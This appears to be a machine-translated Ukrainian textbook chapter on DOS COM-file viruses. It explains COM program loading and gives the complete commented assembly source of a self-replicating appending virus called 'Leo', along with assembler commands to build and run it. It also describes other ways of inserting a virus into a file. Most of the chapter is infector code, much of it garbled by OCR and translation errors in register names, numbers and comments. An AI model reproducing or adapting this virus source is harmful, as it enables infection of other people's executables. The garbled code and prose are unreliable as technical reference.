приховати рекламу

СОМ-віруси

[ виправити ] текст може містити помилки, будь ласка перевіряйте перш ніж використовувати.


Нажми чтобы узнать.
скачати

У цьому розділі розказано про ал-
горітмах роботи вірусів,
заражають СОМ-файли,
і способи їх впровадження. Пред-
ставлена ​​вихідний текст од-
ного з таких вірусів з під-
робном коментарями.
Також наведено основні све-
дення про структуру і принци-
пах роботи СОМ-програми.

10 СОМ-віруси

Комп'ютерні віруси можуть "гніздитися" в найнесподіваніших міс-
тах, наприклад, у записі початкового завантаження MBR (master boot record),
у виконуваних файлах типу СОМ і ЕХЕ, у файлах динамічних біб-
ліотек DLL і навіть у документах текстового процесора Microsoft Word
for Windows. У цьому розділі докладно розглядається будова виру-
са, який уражує СОМ-файли.

Структура і процес завантаження СОМ-програми

Що ж являє собою СОМ-програма, як вона завантажується
в пам'ять і запускається?

Структура СОМ-програми гранично проста - вона містить тільки
код і дані програми, не маючи навіть заголовка. Розмір СОМ-про-
грами обмежений розміром одного сегмента (64Кбайт).

І ще два поняття, які часто будуть зустрічатися:

Program Segment Prefix (PSP) - область пам'яті розміром 256 (OlOOh)
байт, що передує програмі при її завантаженні. PSP містить дан-
ні командного рядка і відносяться до програми змінні.

Disk Transfer Address (DTA) - блок даних, що містить адреси обміну
даними з файлом (читання або запис). Область DTA для роботи
з файлом використовують багато функцій, в тому числі і не виробляють
читання або запис в файл. Прикладом може служити функція 4Eh
(Знайти перший файл за шаблоном), яка буде неодноразово зустрі-
тися в лістингах програм.

Завантаження СОМ-програми в пам'ять і її запуск відбуваються так:

1. Визначається сегментний адресу вільної ділянки пам'яті доста-
точного для розміщення програми розміру.

2. Створюється і заповнюється блок пам'яті для змінних середовища.

3. Створюється блок пам'яті для PSP і програми (сегментЮОООЬ - PSP;

сегментЮЮОЬ - програма). У поля PSP заносяться відповідних
щие значення.

4. Встановлюється адресу DTA рівним PSP: 0080h.

5. Завантажується СОМ-файл з адреси PSP: 0100h.

6. Значення регістра АХ встановлюється відповідно до парамет-
рами командного рядка.

7. Регістри DS, ES і SS встановлюються на сегмент PSP і програм-
ми (PSP.-OOOOh).

8. Регістр SP встановлюється на кінець сегмента, після чого в стек за-
підписується OOOOh.

9. Відбувається запуск програми з адреси PSP: 0100h.

СОМ-програма завжди складається з одного сегмента і запускається з
зміщення OlOOh.

Найпростіший СОМ-вірус

На початку СОМ-файлу зазвичай знаходиться команда безумовного переходу
JMP, що складається з трьох байт. Перший байт містить код команди OE9h,
наступні два - адреса переходу. Оскільки розглянутий нижче ви-
рус навчальний, він буде заражати тільки СОМ-файли, що починаються
з команди JMP. Завдяки простому будовою СОМ-файл до нього дуже
просто додати тіло вірусу і потім вказати його адресу в команді JMP.
На рис. 1.1. показано зараження файлу таким способом.

Після завантаження зараженого файлу управління отримує вірус. Закон-
чив роботу, вірус відновлює оригінальний JMP і передає уп-
равленіе програмі, як показано на рис. 1.2.

Що ж робить розглянутий вірус? Після старту він шукає в теку-
щем каталозі СОМ-програми. Для цього використовується функція 4Eh
(Знайти перший файл):

СОМ-віруси

Тіло вірусу записується в кінець файлу,
туди ж переноситься оригінальний JMP,
на місце якого записується інструкція
JMP на тіло вірусу.

Рис. 1.1.

; Шукаємо перший файл за шаблоном імені
mov ah, 4Eh

mov dx, offset fname - offset myself
add dx.bp
mov cx, 00100111b
int 21h

Потім вірус перевіряє (по першому байту файлу), чи підходять йому най-
денние СОМ-програми:

[Відкриваємо файл
Open:

mov ax, 3D02h

mov dx, 9Eh

int 21h

; Якщо при відкритті файлу помилок не сталося,
; Переходимо до читання, інакше виходимо з вірусу

jnc See_Him

jmp exit

; Читаємо перший байт файлу
See_Him:

xchg bx, ax

mov ah, 3Fh

mov dx, offset buf-offset myself

add dx.bp

xor ex, ex; CX = 0

СОМ-віруси

inc ex [(збільшення на 1) СХ = 1
int 21h

Порівнюємо. Якщо перший байт файлу

, Не E9h, то переходимо до пошуку наступного

. Файлу - цей для зараження не підходить

cmp byte ptr [bp + (offset buf-offset myself)], OE9h

jne find_next

Перед зараженням файлу вірус перевіряє сигнатуру - не виключено,
що файл вже заражений:

Переходимо в кінець файлу (на останній байт)
mov ax, 4200h
xor ex, ex

mov dx, [bp + (offset flen-offset MySelf)]
dec dx
int 21h

; Читаємо сигнатуру вірусу
Read:

mov ah, 3Fh

xor ex, ex

inc ex

mov dx.offset bytik-offset myself

add dx.bp

int 21h

. Якщо при читанні файлу помилок не сталося,

[Перевіряємо сигнатуру,

; Інакше шукаємо Наступне фото

jnc test_bytik

jmp find_next

[Перевіряємо сигнатуру
Test_bytik:

cmp byte ptr [bp + (offset bytik-offset myself)], CheckByte

; Якщо сигнатура є, то шукаємо інший файл,
. Якщо її немає - будемо заражати

je find_next2

jmp NotJnfected

Потім, відповідно до запропонованої схеми, вірус дописується
в кінець файлу-жертви і встановлює адресу переходу на самого себе:

[Переходимо в кінець файлу
mov ax, 4202h
xor ex, ex
xor dx.dx
int 21h

Зупиняємо регістр DS на сегмент коду
push cs
pop ds

[Копіюємо вірус у файл
mov ah, 40h

mov cx.offset VirEnd-offset la
mov dx, bp

sub dx, offset myself-offset la
int 21h

[Записуємо в початок файлу перехід на тіло вірусу
Write_Jmp:

. Переходимо в початок файлу
xor сх.сх
xor dx, dx
mov ax, 4200h
int 21h

[Записуємо перші три байти файлу (перехід на тіло вірусу)
mov ah, 40h
mov сх, 3

mov dx, offset jmpvir-offset myself
add dx.bp
int 21h

Після того, як вірус закінчить свою роботу, він відновлює
в початковий стан перші три байти програми (у пам'яті комп'ютерах
тера) і передає керування на початок програми. Далі, при
запуску зараженого файлу, управління спочатку отримує вірус, потім -
вихідна програма. Завдяки такій схемі роботи розглянутий

вірус може спокійно існувати, будучи один раз випущеним
на волю.

Як запустити вірус? У будь-якому текстовому редакторі створюється файл
LEO.ASM, що містить вихідний текст вірусу, потім цей файл комп-
ліруется і компонується готова програма. Наприклад, в системі про-
граммирования Turbo Assembler останні два етапи виконуються та-
кими командами:

tasm.exe leo.asm
tlink leo.obj / t

У підсумку вийшов файл LEO.COM, містить готовий СОМ-вірус.
Для перевірки роботи вірусу можна створити окремий каталог і ско-
бенкетувати в нього цей файл, а також кілька інших СОМ-файлів.
Після запуску LEO.COM вірус проникне в усі інші СОМ-фай-
ли. Не варто боятися, що буде заражений відразу весь комп'ютер - вірус
розповсюджується тільки в поточному каталозі. Нижче наводиться результат-
ний текст вірусу:

.286. Встановлюємо тип процесора
CheckByte equ OFOh

[Зазначаємо, що регістри CS і DS містять
; Адресу сегмента коду програми
assume cs: code, ds: code

; Початок сегмента коду. У кінці програми сегмент коду потрібно
; Закрити - "code ends"
code segment

Зупиняємо зміщення в сегменті коду.

Дана рядок обов'язкове

; Для СОМ-програми (всі СОМ-програми

починаються з адреси 100h)

org 100h

start:

; Імітуємо заражений СОМ-файл.
; Тіло вірусу починається з мітки la
; Jmp la

db OE9h; Код команди JMP

dw offset la-offset real
real:

[Виходимо з програми
mov ah, 4Ch
int 21 h

; 3десь починається тіло вірусу
la:

; Зберігаємо регістри і прапори
pushf
pusha
push ds es

. Отримуємо точку входу.

; Для цього викликаємо підпрограму (наступний

; За викликом адреса) і читаємо з стека адресу повернення

call MySelf
MySelf:

pop bp

відновлюємо перші три байти вихідної програми
mov al, [bp + (offset bytes_3 [0]-offset MySelf)]
mov byte ptr cs: [100h], al
mov al, [bp + (offset bytes_3 [1]-offset MySelf)]
mov byte ptr cs: [101h], al
mov al, [bp + (offset bytes_3 [2]-offset MySelf)]
mov byte ptr cs: [102h], al

[Подальше завдання вірусу - знайти нову жертву.

; Для цього використовується функція 4Eh (Знайти перший файл).

; Шукаємо файл з будь-якими атрибутами

Find_First:

. Шукаємо перший файл за шаблоном імені
mov ah, 4Eh

mov dx.offset fname-offset myself
add dx.bp

mov cx, 00100111b
int 21 h

; Якщо файл знайдений - переходимо до зміни атрибутів, інакше виходимо
; З вірусу (тут немає відповідних для зараження файлів)

jnc attributes

jmp exit
attributes:

. Читаємо оригінальні атрибути файлу
mov ax, 4300h

mov dx, 9Eh. Адреса імені файлу
int 21 h

. Зберігаємо оригінальні атрибути файлу
push ex

•. Встановлюємо нові атрибути файлу
mov ax, 4301h

mov dx, 9Eh. Адреса імені файлу
mov cx, 20h
int 21 h

Переходимо до відкриття файлу
jmp Open

; Шукаємо наступний файл, так як попередній не підходить
FincLNext:

; Відновлюємо оригінальні атрибути файлу
mov ax, 4301h

mov dx, 9Eh; Адреса імені файлу
pop сх
int 21 h

[Закриваємо файл
mov ah, 3Eh
int 21 h

; Шукаємо Наступне фото
mov ah, 4Fh
int 21 h

; Якщо файл знайдений - переходимо до зміни атрибутів, інакше виходимо
; З вірусу (тут немає відповідних для зараження файлів)

jnc attributes

jmp exit

.- Відкриваємо файл
Open:

mov ax, 3D02h

mov dx, 9Eh

int 21 h

; Якщо при відкритті файлу помилок не сталося -
. Переходимо до читання, інакше виходимо з вірусу

jnc See_Him

jmp exit

; Читаємо перший байт файлу
See_Him:

xchg bx.ax

mov ah, 3Fh

mov dx.offset buf-offset myself

add dx, bp

xor ex, ex; CX = 0

inc ex [(збільшення на 1) СХ = 1

int 21 h

. Порівнюємо. Якщо перший байт файлу

, Не E9h, то переходимо до пошуку наступного файлу -

; Цей для зараження не підходить

cmp byte ptr [bp + (offset buf-offset myself)], OE9h

jne find_next

; Переходимо в початок файлу
mov ax, 4200h
xor ex, ex
xor dx.dx
int 21 h

[Читаємо перші три байти файлу в тіло вірусу
See_Him2:

mov ah, 3Fh

mov dx, offset bytes_3-offset myself

add dx.bp

mov cx, 3

int 21 h

. Отримуємо довжину файлу, для чого переходимо в кінець файлу
Testik:

mov ax, 4202h

xor ex, ex

xor dx.dx

int 21h
Size_test:

; Зберігаємо отриману довжину файлу

mov [bp + (offset flen-offset MySelf)], ax

[Перевіряємо довжину файлу
cmp ax.64000

; Якщо файл не більше 64000 байт, - переходимо

; До наступної перевірки,

; Інакше шукаємо інший файл (цей занадто великий для зараження)

jna richJest

jmp find_next

Перевіримо, не заражений файл.
; Для цього перевіримо сигнатуру вірусу
RichJest:

[Переходимо в кінець файлу (на останній байт)
mov ax, 4200h
xor сх.сх

mov dx, [bp + (offset flen-offset MySelf)]
dec dx
int 21h

; Читаємо сигнатуру вірусу
Read:

mov ah, 3Fh

xor ex, ex

inc ex

mov dx, offset bytik-offset myself

add dx.bp
int 21 h

; Якщо при читанні файлу помилок

; Не сталося - перевіряємо сигнатуру,

. Інакше шукаємо Наступне фото

jnc test_bytik

jmp tind_next

; Перевіряємо сигнатуру
Test_bytik:

cmp byte ptr [bp + (offset bytik-offset myself)], CheckByte

; Якщо сигнатура є, то шукаємо інший файл,
. Якщо ні - будемо заражати

jne NotJnfected

jmp find_next

. Файл не заражений - будемо заражати
NotJnfected:

mov ax, [bp + (offset flen-offset myself)]

sub ax, 03h

mov [bp + (offset jmp_cmd-offset myself)], ax
l_am_copy:

. Переходимо в кінець файлу
mov ax, 4202h
xor ex, ex
xor dx.dx
int 21 h

[Встановлюємо регістр DS на сегмент коду
push cs
pop ds

. Копіюємо вірус у файл
mov ah, 40h

mov ex, offset VirEnd-offset la
mov dx.bp

sub dx, offset myself-offset la
int 21 h

Записуємо в початок файлу перехід на тіло вірусу
Write_Jmp:

. Переходимо в початок файлу
хог сх.сх
xor dx, dx
mov ax, 4200h
int 21 h

[Записуємо перші три байти файлу (перехід на тіло вірусу)
mov ah, 40h
mov сх, 3

mov dx.offset jmpvir-offset myself
add dx.bp
int 21h

; 3акриваем файл
Close:

mov ah, 3Eh

int 21h

; Відновлюємо оригінальні атрибути файлу

mov ax, 4301h

mov dx, 9Eh

pop ex

int 21h
exit:

відновлюємо початкові значення регістрів і прапорів
pop es ds
рора
popf

Передаємо керування програмі-носію
push 100h
retn

-. Байт для читання сигнатури
bytik db (?)

. Зарезервовано для зміни трьох байт вірусу
jmpvir db OE9h
jmp_cmd dw (?)

; Довжина файлу
flen dw (?)

; Шаблон для пошуку файлів
fname db "*. com", 0

; 0бласть для зберігання команди переходу
bytes_3 db 90h, 90h, 90h

; Байт пам'яті для читання першого байта файлу
; З метою перевірки (Е9п)
buf db (?)

; Назва вірусу
virus_name db "Leo"

; Сигнатура

a db CheckByte

VirEnd:

code ends

end start

Способи впровадження СОМ-вірусів

Розглянутий вірус дописується в кінець файлу, а в початок файлу
вписував перехід на себе. Існують і інші способи впровадження
вірусів.

Розглянемо два варіанти впровадження СОМ-вірусу в початок файлу.
Варіант перший. Вірус переписує початок програми в кінець файлу,
щоб звільнити місце для себе. Після цього тіло вірусу записує-
ся в початок файлу, а невелика його частина, що забезпечує перенесення ви-
тісненими фрагмента програми, на колишнє місце - в кінець. При вос-
становленні первісного вигляду програми її вірусу
затерто, тому код вірусу, який відновлює програму, повинен
перебувати в безпечному місці, окремо від основного тіла вірусу.
Цей спосіб впровадження зображений на рис. 1.3.

СОМ-віруси

Рис. 1.3.

Під час завантаження зараженого таким способом файлу керування отримає
вірус (так як він знаходиться на початку файлу і буде завантажений з адреси
OlOOh). Після закінчення роботи вірус передає управління коду, пере-
носить витиснену частину програми на колишнє місце. Після вос-
становлення (у пам'яті, не у файлі) первісного вигляду програми,
вона запускається. Схема роботи вірусу зображена на рис. 1.4.

Другий варіант відрізняється від першого тим, що вірус, звільняючи для
себе місце, зрушує все тіло програми, а не переносить її частина в ко-
нець файлу. Цей спосіб впровадження зображений на рис. 1.5.

Після запуску зараженої програми, як і в попередньому випадку,
управління отримує вірус. Подальша робота вірусу відрізняється
тільки тим, що частина вірусу, відновлююча первинний вигляд

СОМ-віруси

програми, переносить до адреси OlOOh все тіло програми, а не тільки
витиснену частину. Схема роботи вірусу, що заражає файл таким
чином, наведена на рис. 1.6.

Існують різновиди вірусів, не дописуйте частину свого
тіла в кінець файлу. Наприклад, вірус може впроваджуватися в середину
файлу. У цьому випадку алгоритм роботи вірусу є сумішшю алгоритми
мов одного з двох тільки що описаних вірусів і вірусу, описано-
го в розділі "Найпростіший СОМ-вірус".

СОМ-віруси


Додати в блог або на сайт

Цей текст може містити помилки.

Програмування, комп'ютери, інформатика і кібернетика | Доповідь
26.9кб. | скачати


Схожі роботи:
Послідовні інтерфейси СОМ-порт
Подводнаяч човен Сом б Fulton
Підводні човни типу Сом
Віруси
Віруси 4
Віруси 3
Віруси 2
Віруси і антивіруси
Що таке віруси

Нажми чтобы узнать.
© Усі права захищені
написати до нас
Рейтинг@Mail.ru